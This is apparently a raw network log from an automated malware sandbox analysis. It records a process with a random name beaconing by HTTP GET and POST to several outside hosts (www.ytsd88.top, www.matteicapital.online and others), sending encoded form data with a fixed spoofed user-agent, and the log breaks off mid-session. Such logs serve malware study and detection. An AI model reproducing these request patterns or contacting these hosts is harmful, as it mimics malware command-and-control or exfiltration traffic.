                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.649982194.85.61.76802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:31.211147070 CET365OUTGET /2pji/?4nJt=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT4yZs3PgO7inQ/GZvdPSYtqhraoLnL30EVGtCNPTPRdM0+5LARJM=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.mrpokrovskii.pro
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:18:32.589325905 CET691INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:32 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 548
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.65000047.76.213.197802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:38.872106075 CET603OUTPOST /egqi/ HTTP/1.1
                                                                                                                      Host: www.ytsd88.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ytsd88.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ytsd88.top/egqi/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 57 35 66 78 66 53 66 32 68 6a 52 31 47 66 48 6b 47 51 2f 46 49 44 64 32 30 53 31 52 50 53 4a 76 4d 48 66 47 35 31 45 38 42 6d 36 4d 4b 79 56 50 42 5a 42 69 48 56 6c 58 37 52 6e 6f 4c 36 62 58 55 35 51 51 4c 77 56 46 33 46 4f 41 32 43 47 51 41 65 63 61 6b 74 64 33 35 4b 52 39 37 63 36 38 59 6c 5a 30 6c 7a 62 38 35 2b 59 71 6c 43 4b 58 39 35 68 63 74 2f 30 65 2f 6a 66 57 64 43 38 41 4a 32 79 37 31 2f 4e 34 67 51 53 44 39 76 52 5a 46 65 6b 78 71 42 74 55 56 77 72 62 32 46 4c 65 43 4d 49 73 77 71 56 39 68 41 2b 2f 73 49 57 6b 64 6e 48 6c 58 59 4a 63 77 4b 51 47 6d 47 33 59 73 56 46 55 2f 68 4b 58 5a 63 4e 79
                                                                                                                      Data Ascii: 4nJt=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeCMIswqV9hA+/sIWkdnHlXYJcwKQGmG3YsVFU/hKXZcNy
                                                                                                                      Nov 26, 2024 11:18:40.501252890 CET574INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:40 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 409
                                                                                                                      Connection: close
                                                                                                                      ETag: "66d016cf-199"
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.65000647.76.213.197802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:41.537240982 CET627OUTPOST /egqi/ HTTP/1.1
                                                                                                                      Host: www.ytsd88.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ytsd88.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ytsd88.top/egqi/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 51 4b 4d 4b 54 6c 50 41 59 42 69 55 6c 6c 58 6a 42 6e 74 46 61 61 36 55 35 73 59 4c 78 70 46 33 42 65 41 32 44 32 51 41 74 30 64 6b 39 64 50 31 71 52 2f 6a 38 36 38 59 6c 5a 30 6c 7a 6e 57 35 2b 41 71 6c 7a 36 58 38 62 5a 66 6b 66 30 64 33 44 66 57 4c 43 38 4d 4a 32 79 6a 31 2b 42 57 67 53 71 44 39 72 64 5a 47 4d 4d 77 7a 78 74 57 52 77 72 50 79 30 7a 52 49 71 46 50 76 59 56 44 2f 6a 75 73 74 2b 4c 2b 42 55 48 47 46 49 70 65 77 49 49 30 6d 6d 33 79 75 56 39 55 74 32 47 77 57 6f 6f 52 49 61 78 69 65 50 46 33 64 34 6f 6e 2b 5a 68 78 70 75 33 41 73 51 3d 3d
                                                                                                                      Data Ascii: 4nJt=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFIpewII0mm3yuV9Ut2GwWooRIaxiePF3d4on+Zhxpu3AsQ==
                                                                                                                      Nov 26, 2024 11:18:43.132440090 CET574INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:42 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 409
                                                                                                                      Connection: close
                                                                                                                      ETag: "66d016cf-199"
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.2.65000847.76.213.197802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:44.192878962 CET1640OUTPOST /egqi/ HTTP/1.1
                                                                                                                      Host: www.ytsd88.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ytsd88.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ytsd88.top/egqi/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 54 71 4d 4b 46 35 50 42 37 5a 69 58 6c 6c 58 39 52 6e 73 46 61 62 34 55 39 34 69 4c 78 6c 56 33 48 43 41 32 6c 69 51 52 6f 41 64 71 39 64 50 39 4b 52 2b 37 63 36 54 59 6c 4a 4f 6c 79 4c 57 35 2b 41 71 6c 77 53 58 31 70 68 66 6f 2f 30 65 2f 6a 65 5a 64 43 39 52 4a 32 71 64 31 2b 46 6f 67 42 69 44 39 4c 4e 5a 57 76 6b 77 73 42 74 59 57 77 71 49 79 31 4f 52 49 73 68 70 76 5a 78 74 2f 68 79 73 74 61 76 67 52 55 7a 43 58 4f 31 52 72 4c 6b 4e 6f 57 72 52 68 6c 6c 4d 68 47 79 38 63 49 59 55 49 4e 78 54 57 4e 77 64 55 61 49 75 35 4d 38 43 38 66 75 6c 34 62 59 49 38 58 72 6d 67 77 76 47 32 4f 69 78 43 77 52 2f 52 6f 42 4a 35 6b 39 71 41 77 6e 55 76 31 62 54 71 78 6e 32 4b 4d 6b 4d 77 45 6a 46 4b 42 33 67 4c 67 42 48 2b 50 37 46 2f 76 33 53 33 66 49 6a 6d 48 73 68 63 4c 4c 59 7a 71 31 44 68 75 6c 49 57 55 6b 2b 69 50 2f 6e 50 79 47 52 45 41 62 57 4c 52 39 50 73 6b 4c 57 6c [TRUNCATED]
                                                                                                                      Data Ascii: 4nJt=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBTqMKF5PB7ZiXllX9RnsFab4U94iLxlV3HCA2liQRoAdq9dP9KR+7c6TYlJOlyLW5+AqlwSX1phfo/0e/jeZdC9RJ2qd1+FogBiD9LNZWvkwsBtYWwqIy1ORIshpvZxt/hystavgRUzCXO1RrLkNoWrRhllMhGy8cIYUINxTWNwdUaIu5M8C8ful4bYI8XrmgwvG2OixCwR/RoBJ5k9qAwnUv1bTqxn2KMkMwEjFKB3gLgBH+P7F/v3S3fIjmHshcLLYzq1DhulIWUk+iP/nPyGREAbWLR9PskLWlWK4TRkzJH/SC8evxyKAassN7gA+vI0qiloyhQEJ9MGfkF5D/ZGhzp8qkhQVz9VqqsWXl5bH9cRO7kTNQL7N9czGv8hfAqMWVFqeuxiBXMC6Ir3s034msE0R3He9ms4waPEad/GlMQYcpp1afC0HMelEsXAIx2jluVWZeP0gDm7ZQrx2fZwskU+kyjts8GNJiDxM24byD9Z62hRteoK6e3CzDLqVfl5zFwzLlcHwmB3akQgn2M8HVfG++rIMhHGDf/7TJHxPvXLSN4aO6rkWYU7F9i1ij0j2eVMpz298jUJrQ1W7x/kF/viwoLBo0EyjS2bVj4kPtg0y9Gik0PfanLUJvelNXFEItRb8W2bDwj0wnWR/qk84kbGjS8vo8XrEYupt8n3040RN6WqyA2OxdI4S7PlvmRpSOFhQhmdikYhVeXha4iOIi/2LcOPVmNPDlVKKo7k8IOlXqxi50sxky6I4jOU0VeK0Mu+Xvckuhq3PH584Kj+iJ2Tix1dkeWteJM8jtGGJ+HdZW5C5WoprucA+RCSyn4Zh7mHDXDrGHg95uaZ9lrfPutLD6Vh7KQPhrCuLotDEi8IJV68o3hvk6YSGJPhtP033D965rv/JjE/I5r5/qskxgvsvt45eTheDeb260CM0E9X/MVVo9qR2RaBIJYpKcH8HAZR [TRUNCATED]
                                                                                                                      Nov 26, 2024 11:18:45.767977953 CET574INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:45 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 409
                                                                                                                      Connection: close
                                                                                                                      ETag: "66d016cf-199"
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.2.65000947.76.213.197802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:46.846867085 CET359OUTGET /egqi/?4nJt=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8hsZr969MltuXdWdWoGPR3ZZyiGe82JgugZANkAzsKk95fWmtipo=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.ytsd88.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:18:48.481254101 CET574INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:48 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 409
                                                                                                                      Connection: close
                                                                                                                      ETag: "66d016cf-199"
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.2.650010208.91.197.27802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:54.893556118 CET633OUTPOST /hyyd/ HTTP/1.1
                                                                                                                      Host: www.matteicapital.online
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.matteicapital.online
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.matteicapital.online/hyyd/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 56 55 49 64 6e 47 68 68 34 68 66 4f 56 51 50 49 48 71 63 6c 33 61 33 56 6b 70 30 30 44 47 32 66 6f 49 4b 50 58 54 4b 6f 72 66 72 6c 78 57 64 46 57 4e 4e 77 4f 56 50 73 6d 79 33 2b 51 6f 4c 51 2f 44 34 6c 31 58 69 37 35 69 6a 55 61 79 57 75 47 57 58 5a 4a 69 6a 41 34 36 54 43 50 68 6f 37 41 69 36 36 73 48 30 58 49 36 4b 78 49 35 38 63 52 2b 4f 47 65 69 78 34 78 71 64 58 55 2f 4c 2f 4c 5a 32 49 73 59 62 43 50 39 31 50 68 54 54 39 66 48 79 38 6d 46 32 6f 58 35 75 55 56 2f 6a 31 44 46 55 34 72 2b 31 66 57 73 4c 71 77 2b 36 31 4e 69 30 51 2b 48 46 65 35 64 4c 52 6e 38 74 6e
                                                                                                                      Data Ascii: 4nJt=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8mF2oX5uUV/j1DFU4r+1fWsLqw+61Ni0Q+HFe5dLRn8tn


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.2.650011208.91.197.27802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:57.552764893 CET657OUTPOST /hyyd/ HTTP/1.1
                                                                                                                      Host: www.matteicapital.online
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.matteicapital.online
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.matteicapital.online/hyyd/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 43 66 70 70 36 50 47 68 79 6f 6f 66 72 6c 36 32 64 45 59 74 4e 6e 4f 56 53 66 6d 7a 4c 2b 51 73 6a 51 2f 47 63 6c 31 6b 36 34 35 79 6a 57 4f 43 57 57 49 32 58 5a 4a 69 6a 41 34 35 75 58 50 68 77 37 42 53 4b 36 2b 57 31 6c 54 61 4b 79 50 35 38 63 47 75 4f 4b 65 69 77 76 78 70 59 79 55 35 50 2f 4c 5a 47 49 73 4a 62 42 47 39 31 46 2b 44 54 74 57 69 72 71 6b 30 54 43 64 5a 47 6b 4f 50 6e 73 43 7a 4a 69 33 4e 31 38 45 38 72 6f 77 38 69 48 4e 43 30 36 38 48 39 65 72 4b 48 32 6f 49 49 45 4f 71 49 54 33 4f 66 33 70 67 34 59 61 33 50 61 6f 5a 46 75 64 67 3d 3d
                                                                                                                      Data Ascii: 4nJt=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E8row8iHNC068H9erKH2oIIEOqIT3Of3pg4Ya3PaoZFudg==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.2.650012208.91.197.27802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:00.209126949 CET1670OUTPOST /hyyd/ HTTP/1.1
                                                                                                                      Host: www.matteicapital.online
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.matteicapital.online
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.matteicapital.online/hyyd/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
